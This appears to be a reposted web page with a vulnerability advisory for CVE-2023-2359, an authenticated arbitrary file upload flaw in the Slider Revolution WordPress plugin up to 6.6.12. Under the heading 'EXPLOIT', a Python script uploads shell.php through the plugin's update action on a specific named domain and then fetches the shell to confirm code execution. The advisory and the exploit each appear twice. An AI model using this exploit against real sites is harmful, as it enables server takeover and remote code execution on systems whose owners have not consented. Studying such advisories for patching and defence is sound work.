توییت
Slider Revolution <= 6.6.12 - Authenticated (Administrator+) Arbitrary File Upload
7.2
Unrestricted Upload of File with Dangerous Type
CVSS VectorCVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
CVE CVE-2023-2359
CVSS 7.2 (High)
Publicly Published May 22, 2023
Last Updated May 30, 2023
Researcher Marco Frison
Description
The Slider Revolution plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in versions up to, and including, 6.6.12. This makes it possible for authenticated attackers with administrator-level attackers to upload arbitrary files on the affected site's server which may make remote code execution possible. While the default settings allow only administrators to exploit this vulnerability, this privilege can be granted to users as low as author.
EXPLOIT :
###################################
# online check and attack
# Revolution Slider <= 6.6.12 - Author+ Remote Code Execution
###################################
import unittest
import requests
class TestSliderRevolution(unittest.TestCase):
def test_upload_file(self):
url = "http://adroom.ir/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_actio n=update_plugin"
file = open("shell.php", "rb")
data = {"update_file": file}
response = requests.post(url, files=data)
self.assertEqual(response.status_code, 200)
self.assertIn("Update in progress", response.text)
def test_execute_code(self):
url = "http://adroom.ir/wp-content/plugins/revslider/temp/update_extract/revslider/shell.php"
response = requests.get(url)
self.assertEqual(response.status_code, 200)
self.assertIn("Hello, world!", response.text)
if __name__ == "__main__":
unittest.main()
7.2
Unrestricted Upload of File with Dangerous Type
CVSS VectorCVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
CVE CVE-2023-2359
CVSS 7.2 (High)
Publicly Published May 22, 2023
Last Updated May 30, 2023
Researcher Marco Frison
Description
The Slider Revolution plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in versions up to, and including, 6.6.12. This makes it possible for authenticated attackers with administrator-level attackers to upload arbitrary files on the affected site's server which may make remote code execution possible. While the default settings allow only administrators to exploit this vulnerability, this privilege can be granted to users as low as author.
EXPLOIT :
###################################
# online check and attack
# Revolution Slider <= 6.6.12 - Author+ Remote Code Execution
###################################
import unittest
import requests
class TestSliderRevolution(unittest.TestCase):
def test_upload_file(self):
url = "http://adroom.ir/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_actio n=update_plugin"
file = open("shell.php", "rb")
data = {"update_file": file}
response = requests.post(url, files=data)
self.assertEqual(response.status_code, 200)
self.assertIn("Update in progress", response.text)
def test_execute_code(self):
url = "http://adroom.ir/wp-content/plugins/revslider/temp/update_extract/revslider/shell.php"
response = requests.get(url)
self.assertEqual(response.status_code, 200)
self.assertIn("Hello, world!", response.text)
if __name__ == "__main__":
unittest.main()